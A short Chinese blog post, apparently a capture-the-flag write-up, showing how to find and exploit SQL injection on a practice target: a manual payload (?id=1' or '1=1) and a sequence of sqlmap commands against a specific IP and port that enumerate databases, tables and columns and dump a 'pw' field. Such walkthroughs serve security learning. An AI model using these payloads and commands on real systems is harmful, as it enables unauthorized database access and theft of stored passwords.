文章介绍了如何通过手动输入(方法一)和自动化工具sqlmap来检测SQL注入,包括使用万能密码测试、识别cyber库中的表和列,以及提取pw字段数据。重点展示了在Linux环境下使用sqlmap进行数据库渗透测试的过程。
检测是否有sql注入,?id=1 or 1=2,报错,说明可以注入。
方法一:手注
使用万能密码:/?id=1' or '1=1
其中两个单引号很重要,是用来闭合sql程序中的引号。
方法二:sqlmap
如果没有下载sqlmap,可以参考,一般在Linux上使用sqlmap更为方便。
下载好了使用sqlmap -h查看使用方法。可能需要使用python或python3才能运行sqlmap.py,这样会比较麻烦,应该是环境变量的问题。如果遇到类似/usr/bin/env: ‘python’: No such file or directory的问题,可以参考这篇文章。
- 检测所有存在的数据库:
sqlmap -u "http://61.147.171.105:60963/?id=1" --dbs --random-agent
其中cyber库有嫌疑。
- 检测cyber库中的表:
sqlmap -u "http://61.147.171.105:60963/?id=1" --dbs --random-agent -D cyber --tables
只有一个cyber。
- 查看cyber表中的所有列:
sqlmap -u "http://61.147.171.105:60963/?id=1" --dbs --random-agent -D cyber -T cyber --columns
- 插看pw中的字段:
sqlmap -u "http://61.147.171.105:60963/?id=1" --dbs --random-agent -D cyber -T cyber -C pw --dump
扫一扫
4439
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
